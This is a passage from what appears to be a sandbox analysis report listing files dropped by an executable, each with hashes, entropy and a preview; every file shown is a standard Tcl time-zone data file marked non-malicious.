                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Antarctica/Mawson) {.. {-9223372036854775808 0 0 -00}.. {-501206400 21600 0 +06}.. {1255809600 18000 0 +05}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):195
                                                                                                                                                                                                                              Entropy (8bit):4.880387042335617
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3ycqXHAIgObOvRN/2L0z6/fy:MByMdTiYt2LrK
                                                                                                                                                                                                                              MD5:88EE32AE5C538AEBFDE2D1D944ED5B2B
                                                                                                                                                                                                                              SHA1:55E7234E6FFF298182A6C8889A9F506CDCE7C959
                                                                                                                                                                                                                              SHA-256:E9D99293C5B275D8E0D7B066084177EDF670D5B52B81E87608BAB02025F33155
                                                                                                                                                                                                                              SHA-512:45A3EA146CA719BA6F22E99EAA57AC1DED1C762E19BDFBA176E5FEAC36EC58586F771572DD16ACE09E660F97DEB91A701BA1B1F1AEF3BD8688F3451C0772420A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Pacific/Auckland)]} {.. LoadTimeZoneFile Pacific/Auckland..}..set TZData(:Antarctica/McMurdo) $TZData(:Pacific/Auckland)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2613
                                                                                                                                                                                                                              Entropy (8bit):3.6082359166067905
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5fzJS6S4wRSenSOaf7HSKSkSqS7STslSmSMSCSxygSiXS/SrS+S9SfShS7SoSlSL:jdeRtnxaf7HlPlgiot7JC/Xk8NWse4rf
                                                                                                                                                                                                                              MD5:BDFA5908E735F866FEC16F6B481AD385
                                                                                                                                                                                                                              SHA1:524AEE21BB97D923A8812A5722AF2FEA43B4D971
                                                                                                                                                                                                                              SHA-256:1637381A20E9D5C6A530F110BDB08D9515E675C9206F000407D8511074948E61
                                                                                                                                                                                                                              SHA-512:3D65C7941BA15A698264848F9B6F43ED5B63D4CF86D495334E8E1DC381D63435E9424BBBC389229693D20044FDB8425A7CC805AB5EA055F59D3E0DD4C7AC2A28
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Antarctica/Palmer) {.. {-9223372036854775808 0 0 -00}.. {-157766400 -14400 0 -04}.. {-152654400 -14400 0 -04}.. {-132955200 -10800 1 -04}.. {-121122000 -14400 0 -04}.. {-101419200 -10800 1 -04}.. {-86821200 -14400 0 -04}.. {-71092800 -10800 1 -04}.. {-54766800 -14400 0 -04}.. {-39038400 -10800 1 -04}.. {-23317200 -14400 0 -04}.. {-7588800 -10800 0 -03}.. {128142000 -7200 1 -03}.. {136605600 -10800 0 -03}.. {389070000 -14400 0 -04}.. {403070400 -10800 1 -04}.. {416372400 -14400 0 -04}.. {434520000 -10800 1 -04}.. {447822000 -14400 0 -04}.. {466574400 -10800 1 -04}.. {479271600 -14400 0 -04}.. {498024000 -10800 1 -04}.. {510721200 -14400 0 -04}.. {529473600 -10800 1 -04}.. {545194800 -14400 0 -04}.. {560923200 -10800 1 -04}.. {574225200 -14400 0 -04}.. {592372800 -10800 1 -04}.. {605674800 -14400 0 -04}.. {624427200 -10800 1 -04}.. {63712
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):151
                                                                                                                                                                                                                              Entropy (8bit):4.829975802206526
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/2L0GRHEsKRsMXGm2OHvavFN/H3VVFVGAvFv:SlSWB9eg/2L0rRsDm2OHEN/VVFAKV
                                                                                                                                                                                                                              MD5:C330982049AA053DA62B926627D2F2FA
                                                                                                                                                                                                                              SHA1:050CE68265F1A183F0173C825AC59EAE8B6AB9EB
                                                                                                                                                                                                                              SHA-256:943F10D8E836773F0B7ACD13ED8422C0B27813C7BBE0B09B57697D1D70D21ECE
                                                                                                                                                                                                                              SHA-512:DE9953D0E505D6B110C0CC4E756B5B0311646C9CA4703A33B92147D36CFB4C288D73851E6766CE1432F41AB51B5D0A1D58680BDB4E28F067E1D36F670B4A192E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Antarctica/Rothera) {.. {-9223372036854775808 0 0 -00}.. {218246400 -10800 0 -03}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):198
                                                                                                                                                                                                                              Entropy (8bit):4.906125935761354
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3ycqXHAIgObOvRN/2L0tlo+ply:MByMdTiYt2LMq+p8
                                                                                                                                                                                                                              MD5:8095A3749DBDE05377836D74A4EEFE33
                                                                                                                                                                                                                              SHA1:6987CA972B63AE26A65654961588D51D3EF2166C
                                                                                                                                                                                                                              SHA-256:88057832175BB642B23FC99F788A2F78A24005CF1F84A7B1B5E8C84FB8F4D4C1
                                                                                                                                                                                                                              SHA-512:9066104C9C16D2AB88523D651C74CE268468E093A497D128D0D12A986BD62DBC1388A56ED1737C2AFACF04185CF06FD0EE66797A3390B2F0E1EB08A4D92AAFAD
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Pacific/Auckland)]} {.. LoadTimeZoneFile Pacific/Auckland..}..set TZData(:Antarctica/South_Pole) $TZData(:Pacific/Auckland)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):178
                                                                                                                                                                                                                              Entropy (8bit):4.871844665431957
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8t14XHAIgNsM13oOARL/2L0GRHEtWlFBQWFK81Fn:SlSWB9vsM3yN14HAIgaM1YOAN/2L0tQB
                                                                                                                                                                                                                              MD5:CA52057130DCF506D11A7CC069F4FBA3
                                                                                                                                                                                                                              SHA1:2C38B7E7872BB41C3569DFCB539C3EC3AAE24FDD
                                                                                                                                                                                                                              SHA-256:2488805DE4FEA42305689F679F1AE2D80B1E934E657FEA329AD39A82DAC63022
                                                                                                                                                                                                                              SHA-512:B19D409870939C8F0834C6C028239E010EE5128DFA6E97D4903BECA229B04FE530EA376B936767D9BFE21709720C1791289D8E3622B17C18F2680B0670794A02
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Riyadh)]} {.. LoadTimeZoneFile Asia/Riyadh..}..set TZData(:Antarctica/Syowa) $TZData(:Asia/Riyadh)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):5370
                                                                                                                                                                                                                              Entropy (8bit):3.5134546899897146
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:YveRdmbxnKIJqU9XThVIsopb8BcrFgoZVlzeEG+PtJ:UeRdmNnKIIajfopb3FVVJ
                                                                                                                                                                                                                              MD5:442F495C36B31CA5D7A9BEFF12105AEF
                                                                                                                                                                                                                              SHA1:B3F6CA5B4A5756F9B2C09A27198F7A651CC6032D
                                                                                                                                                                                                                              SHA-256:6FD5AB8B7B308CDCEA4B747A81D8675988AE218813C91714FC4CA97919CEBEA5
                                                                                                                                                                                                                              SHA-512:C6EAECC26D67D218615EBB5602639DAB62A2578BD9683553D765DC1AC5580627D29B6F911388F5F1BFC284278EA4EBECE94630D3C6B95FF9EF93D3D61A3C2028
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Antarctica/Troll) {.. {-9223372036854775808 0 0 -00}.. {1108166400 0 0 +00}.. {1111885200 7200 1 +02}.. {1130634000 0 0 +00}.. {1143334800 7200 1 +02}.. {1162083600 0 0 +00}.. {1174784400 7200 1 +02}.. {1193533200 0 0 +00}.. {1206838800 7200 1 +02}.. {1224982800 0 0 +00}.. {1238288400 7200 1 +02}.. {1256432400 0 0 +00}.. {1269738000 7200 1 +02}.. {1288486800 0 0 +00}.. {1301187600 7200 1 +02}.. {1319936400 0 0 +00}.. {1332637200 7200 1 +02}.. {1351386000 0 0 +00}.. {1364691600 7200 1 +02}.. {1382835600 0 0 +00}.. {1396141200 7200 1 +02}.. {1414285200 0 0 +00}.. {1427590800 7200 1 +02}.. {1445734800 0 0 +00}.. {1459040400 7200 1 +02}.. {1477789200 0 0 +00}.. {1490490000 7200 1 +02}.. {1509238800 0 0 +00}.. {1521939600 7200 1 +02}.. {1540688400 0 0 +00}.. {1553994000 7200 1 +02}.. {1572138000 0 0 +00}.. {1585443600 7200 1 +02}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):179
                                                                                                                                                                                                                              Entropy (8bit):4.940298769001579
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8s4YkyXHAIgNrYOARL/2L0GRHEoKcMFeWFKjov:SlSWB9vsM3yMGSHAIgvAN/2L0XcMFewh
                                                                                                                                                                                                                              MD5:F61B4D02530B54A8EB1CA7B34BF6D553
                                                                                                                                                                                                                              SHA1:EB85E044EF9F7D11310C5EBB8D1D0C49A1E3067F
                                                                                                                                                                                                                              SHA-256:1892E98C13AC141C8C92EAB942B073A464BA5E2C000C250F97F860BE6B108127
                                                                                                                                                                                                                              SHA-512:E725E909A4056B7E4FADBE66B69E6C4752595F3357E670A7D740A2DA957F2C9502ECA57B9BA874045ED032B8F65A10D11AFAF69EA9673187FD4AE08793492470
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Urumqi)]} {.. LoadTimeZoneFile Asia/Urumqi..}..set TZData(:Antarctica/Vostok) $TZData(:Asia/Urumqi)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):187
                                                                                                                                                                                                                              Entropy (8bit):4.947168975083595
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxV/y+YF3vXHAIgoq8yFRRL/2XbeLo4cA4FH/h8QahV:SlSWB9vsM3ymhVoPHAIgoh6N/2XbUyAH
                                                                                                                                                                                                                              MD5:A4F076D7D716467B78EA382FA222CB38
                                                                                                                                                                                                                              SHA1:21D7FBA308ADC652F541A0336929B862F7B1BD0B
                                                                                                                                                                                                                              SHA-256:25462B656D240DA6B01C1A630FAC04B25DD65C799B659BE1C8BD3AB62610966F
                                                                                                                                                                                                                              SHA-512:1B6BD455E533D5BDC7F3506561A9CA804B1F9CA5CC0665AAB0FC083106AB32FF149DD5FFF62EF7BABAD87E3274F264446D492FB8BE160C9C7F281C7060BF1F61
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Berlin)]} {.. LoadTimeZoneFile Europe/Berlin..}..set TZData(:Arctic/Longyearbyen) $TZData(:Europe/Berlin)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):171
                                                                                                                                                                                                                              Entropy (8bit):4.829666491766117
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8t14XHAIgNsM13oOARL/2WFK4h4WFK81Fn:SlSWB9vsM3yN14HAIgaM1YOAN/2wKs46
                                                                                                                                                                                                                              MD5:60D7F3194F19179E0CF0F561F9C40EE6
                                                                                                                                                                                                                              SHA1:B079EC49485CFBFFB7A5BE6149319B75684258E9
                                                                                                                                                                                                                              SHA-256:8FCDDB246932BAED880B70C0CA867057E7989AEA55EDDC174430E1055CD1058D
                                                                                                                                                                                                                              SHA-512:0BDC86B1D473D4875C6F7C092F955D0999E6C1F2EF83CFC7726A3C5BFEB0F5CB8E00B1F0CBC1F91F806EC635C472927504DF681A32DAC55EF372DA16FEA9EF40
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Riyadh)]} {.. LoadTimeZoneFile Asia/Riyadh..}..set TZData(:Asia/Aden) $TZData(:Asia/Riyadh)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1637
                                                                                                                                                                                                                              Entropy (8bit):3.732051305399264
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5qehddmvOt81FCuLqecDngO6jPvTpYy5T4TXvKT10SvPFu+a+CK/Eu3CWuD0Vob1:5YvdJqxiF0rvK50Sv9fGSM
                                                                                                                                                                                                                              MD5:D6BCB21F65642F36A159AFD72EC93953
                                                                                                                                                                                                                              SHA1:D3E670E579924E6E4F04AB574D48334FF521D8B2
                                                                                                                                                                                                                              SHA-256:06DC608C0B8CDD69CCE66A6BF86F141C46DF39CB45312E684E46F19ED8CAFF15
                                                                                                                                                                                                                              SHA-512:9A633B629873E5EE5AF923A94865EBE5FD9ECA181B2C47B7368A0828468715E07AD3FD825D5E2312D2D0BA1FA5490E3817C36B6339824C8012A0B75538C4A0DC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Almaty) {.. {-9223372036854775808 18468 0 LMT}.. {-1441170468 18000 0 +05}.. {-1247547600 21600 0 +06}.. {354909600 25200 1 +06}.. {370717200 21600 0 +06}.. {386445600 25200 1 +06}.. {402253200 21600 0 +06}.. {417981600 25200 1 +06}.. {433789200 21600 0 +06}.. {449604000 25200 1 +06}.. {465336000 21600 0 +06}.. {481060800 25200 1 +06}.. {496785600 21600 0 +06}.. {512510400 25200 1 +06}.. {528235200 21600 0 +06}.. {543960000 25200 1 +06}.. {559684800 21600 0 +06}.. {575409600 25200 1 +06}.. {591134400 21600 0 +06}.. {606859200 25200 1 +06}.. {622584000 21600 0 +06}.. {638308800 25200 1 +06}.. {654638400 21600 0 +06}.. {670363200 18000 0 +05}.. {670366800 21600 1 +05}.. {686091600 18000 0 +05}.. {695768400 21600 0 +06}.. {701812800 25200 1 +06}.. {717537600 21600 0 +06}.. {733262400 25200 1 +06}.. {748987200 21600 0 +06}.. {764712
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2682
                                                                                                                                                                                                                              Entropy (8bit):3.7873260611521915
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5MUNHl0Nhb9bGA9jSb0PWtsjOuH7Ay2n3yy7QYoTZg703q4oPuJ9/YXjpdaOP9kA:Fz0T52akyId7+xOXdkwqeIFcR
                                                                                                                                                                                                                              MD5:7E70BD44FBF5BF70E3C5246D3A83A49B
                                                                                                                                                                                                                              SHA1:10A28B0A3189DF347CF9853C024E9467CAC56DBA
                                                                                                                                                                                                                              SHA-256:B70AABECACD3F62AF506DF395AB44F47F2CA091522B04EC87AC1407172DD1BFA
                                                                                                                                                                                                                              SHA-512:766565F837EB777749B2C8AAE6C73A2274A772CEF12E7C2E30A89809FEF1E9ED6B067DF044A4676AA4BE76A64A904692C3887336BF01BA4D5D9A5020FB792938
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Amman) {.. {-9223372036854775808 8624 0 LMT}.. {-1230776624 7200 0 EET}.. {108165600 10800 1 EEST}.. {118270800 7200 0 EET}.. {136591200 10800 1 EEST}.. {149806800 7200 0 EET}.. {168127200 10800 1 EEST}.. {181342800 7200 0 EET}.. {199749600 10800 1 EEST}.. {215643600 7200 0 EET}.. {231285600 10800 1 EEST}.. {244501200 7200 0 EET}.. {262735200 10800 1 EEST}.. {275950800 7200 0 EET}.. {481154400 10800 1 EEST}.. {496962000 7200 0 EET}.. {512949600 10800 1 EEST}.. {528670800 7200 0 EET}.. {544399200 10800 1 EEST}.. {560120400 7200 0 EET}.. {575848800 10800 1 EEST}.. {592174800 7200 0 EET}.. {610581600 10800 1 EEST}.. {623624400 7200 0 EET}.. {641167200 10800 1 EEST}.. {655074000 7200 0 EET}.. {671839200 10800 1 EEST}.. {685918800 7200 0 EET}.. {702856800 10800 1 EEST}.. {717973200 7200 0 EET}.. {733701600 10800 1 EEST}.. {749422800
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2086
                                                                                                                                                                                                                              Entropy (8bit):3.7698340044911616
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5DeEdVrEOeFt7YFpR2kHmxCcUdBbcHDLV2vpXt25A0UeRr9ydzkMfF6USRWk9UuV:5ZejsFLrcZwvJt2F+doTr9Q3G80
                                                                                                                                                                                                                              MD5:6EFC35043BDCA4AB61D72E931DB954E6
                                                                                                                                                                                                                              SHA1:F0B4E76C154DC773073E41AA8E94030E972A986A
                                                                                                                                                                                                                              SHA-256:D9DF64FDA4638F7604624B0F68A885D5ABADB1DE12AF1AF5581C2AF7DD971562
                                                                                                                                                                                                                              SHA-512:16AE582B113D6960C73B64620A8AF20F9D436AA4B3EC8E881617AED3389EB4357931882103F162F19EE8202953A7E6FB4FDD6D7760FB7621F4DB9D229AD13F17
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Anadyr) {.. {-9223372036854775808 42596 0 LMT}.. {-1441194596 43200 0 +12}.. {-1247572800 46800 0 +14}.. {354884400 50400 1 +14}.. {370692000 46800 0 +13}.. {386420400 43200 0 +13}.. {386424000 46800 1 +13}.. {402231600 43200 0 +12}.. {417960000 46800 1 +13}.. {433767600 43200 0 +12}.. {449582400 46800 1 +13}.. {465314400 43200 0 +12}.. {481039200 46800 1 +13}.. {496764000 43200 0 +12}.. {512488800 46800 1 +13}.. {528213600 43200 0 +12}.. {543938400 46800 1 +13}.. {559663200 43200 0 +12}.. {575388000 46800 1 +13}.. {591112800 43200 0 +12}.. {606837600 46800 1 +13}.. {622562400 43200 0 +12}.. {638287200 46800 1 +13}.. {654616800 43200 0 +12}.. {670341600 39600 0 +12}.. {670345200 43200 1 +12}.. {686070000 39600 0 +11}.. {695746800 43200 0 +13}.. {701791200 46800 1 +13}.. {717516000 43200 0 +12}.. {733240800 46800 1 +13}.. {748965
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1665
                                                                                                                                                                                                                              Entropy (8bit):3.7149890651919644
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5uvFlvNhQQvmRKqv0fvzQIovWdvEGvDaDvs5vZlovKWyvNSvTqvIkhYwr:sFBNKs6b03zB0WJEuDa7sFZiKWaN6TiF
                                                                                                                                                                                                                              MD5:A72FB1FE01C93BD7E0A8136635C72639
                                                                                                                                                                                                                              SHA1:2383CF839F50784D4BF8B7EDDB324C80E2DDD0DC
                                                                                                                                                                                                                              SHA-256:96B510AF9B8C6BC1DFA84E9ED5E072F3FD484EEB66BBEBC7B6826ED859ED9027
                                                                                                                                                                                                                              SHA-512:061FECE3C750C0229638DD8AF38FB3E8E48E59E0DE1B13BCFE46483A7A170B71B9BCB0D6F110B6B2EF68510FA940F9066F14CBD59829E222D6644D3657CE1893
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Aqtau) {.. {-9223372036854775808 12064 0 LMT}.. {-1441164064 14400 0 +04}.. {-1247544000 18000 0 +05}.. {370724400 21600 0 +06}.. {386445600 18000 0 +05}.. {386449200 21600 1 +05}.. {402256800 18000 0 +05}.. {417985200 21600 1 +05}.. {433792800 18000 0 +05}.. {449607600 21600 1 +05}.. {465339600 18000 0 +05}.. {481064400 21600 1 +05}.. {496789200 18000 0 +05}.. {512514000 21600 1 +05}.. {528238800 18000 0 +05}.. {543963600 21600 1 +05}.. {559688400 18000 0 +05}.. {575413200 21600 1 +05}.. {591138000 18000 0 +05}.. {606862800 21600 1 +05}.. {622587600 18000 0 +05}.. {638312400 21600 1 +05}.. {654642000 18000 0 +05}.. {670366800 14400 0 +04}.. {670370400 18000 1 +04}.. {686095200 14400 0 +04}.. {695772000 18000 0 +05}.. {701816400 21600 1 +05}.. {717541200 18000 0 +05}.. {733266000 21600 1 +05}.. {748990800 18000 0 +05}.. {7647156
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1666
                                                                                                                                                                                                                              Entropy (8bit):3.721746335201775
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5FUvalvNhQQvmRKqv0fvzQIovWdvEGvDaDvs5vZlovKWyvNSvTqvIQvyovklvqQR:PwaBNKs6b03zB0WJEuDa7sFZiKWaN6Tt
                                                                                                                                                                                                                              MD5:E278B985BD2515DBCAED8CB741BE9208
                                                                                                                                                                                                                              SHA1:BC9F5E72C430661D7ED1AF04571CE5D0F73DD18D
                                                                                                                                                                                                                              SHA-256:991638FA2AB2A2F7A091A23D78D99306EE73A740F1A03FBAC448EDCAB55A0E38
                                                                                                                                                                                                                              SHA-512:9951DB729B837647CC4B3D2E605525DCCBAFFD39D76460331BF62235DCAE5E4470CDA578F940B1739AABFEC55D293FF60D79AE0EFDFE1EB64E84571881FDEA6A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Aqtobe) {.. {-9223372036854775808 13720 0 LMT}.. {-1441165720 14400 0 +04}.. {-1247544000 18000 0 +05}.. {354913200 21600 1 +06}.. {370720800 21600 0 +06}.. {386445600 18000 0 +05}.. {386449200 21600 1 +05}.. {402256800 18000 0 +05}.. {417985200 21600 1 +05}.. {433792800 18000 0 +05}.. {449607600 21600 1 +05}.. {465339600 18000 0 +05}.. {481064400 21600 1 +05}.. {496789200 18000 0 +05}.. {512514000 21600 1 +05}.. {528238800 18000 0 +05}.. {543963600 21600 1 +05}.. {559688400 18000 0 +05}.. {575413200 21600 1 +05}.. {591138000 18000 0 +05}.. {606862800 21600 1 +05}.. {622587600 18000 0 +05}.. {638312400 21600 1 +05}.. {654642000 18000 0 +05}.. {670366800 14400 0 +04}.. {670370400 18000 1 +04}.. {686095200 14400 0 +04}.. {695772000 18000 0 +05}.. {701816400 21600 1 +05}.. {717541200 18000 0 +05}.. {733266000 21600 1 +05}.. {748990
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):878
                                                                                                                                                                                                                              Entropy (8bit):3.937249024843323
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5ggeRMdIQvNcDvNhQQvmRKqvzQfv7PQIovWxrvEGvDWdDvs5v/RlovKTob3CGcr:5gbkvNSvNhQQvmRKqv0fvzQIovWdvEGD
                                                                                                                                                                                                                              MD5:259179C7A1CA04F9F3A373B6C8FCB8C5
                                                                                                                                                                                                                              SHA1:D042DF8EFD8EC1473B45B1131BD5EB714F1B2C17
                                                                                                                                                                                                                              SHA-256:13745BFA25E6E2D8D0FABAE42CB7C37CF9F974CFB343D4FE84E4E2D64A25926B
                                                                                                                                                                                                                              SHA-512:703BEAD5A1E5B3816D98057A08A87C2139F418787F38561FE35175B84E2005365727F85D1B949CC5DF464B207A7D01BB65FB1A632E73DDA523E843B82D76FBBD
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Ashgabat) {.. {-9223372036854775808 14012 0 LMT}.. {-1441166012 14400 0 +04}.. {-1247544000 18000 0 +05}.. {354913200 21600 1 +05}.. {370720800 18000 0 +05}.. {386449200 21600 1 +05}.. {402256800 18000 0 +05}.. {417985200 21600 1 +05}.. {433792800 18000 0 +05}.. {449607600 21600 1 +05}.. {465339600 18000 0 +05}.. {481064400 21600 1 +05}.. {496789200 18000 0 +05}.. {512514000 21600 1 +05}.. {528238800 18000 0 +05}.. {543963600 21600 1 +05}.. {559688400 18000 0 +05}.. {575413200 21600 1 +05}.. {591138000 18000 0 +05}.. {606862800 21600 1 +05}.. {622587600 18000 0 +05}.. {638312400 21600 1 +05}.. {654642000 18000 0 +05}.. {670366800 14400 0 +04}.. {670370400 18000 1 +04}.. {686095200 14400 0 +04}.. {695772000 18000 0 +05}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):182
                                                                                                                                                                                                                              Entropy (8bit):4.801820439218014
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8xEYM4DyXHAIgN/ZEYovFvWARL/2WFKUNSH+WFKYEQ:SlSWB9vsM3yR+HAIgH8VWAN/2wKUNSeq
                                                                                                                                                                                                                              MD5:5193EF7ADB646798801245BC50C8DDA6
                                                                                                                                                                                                                              SHA1:83ED851CBC60EFB330A8FC119E1BED5B4C0BA630
                                                                                                                                                                                                                              SHA-256:2C752F641B98E3C05B14AE31330D1F198DAA4A7E354BA9670C7754926BFB891A
                                                                                                                                                                                                                              SHA-512:E940E1BE67A9AC895F3D060B1CB34797A429147A9DC2AC0F1162D37D86661EF217EDABA720F0AE3796186FE801229210AC785BB4511CBBE5A41791D236101D8C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
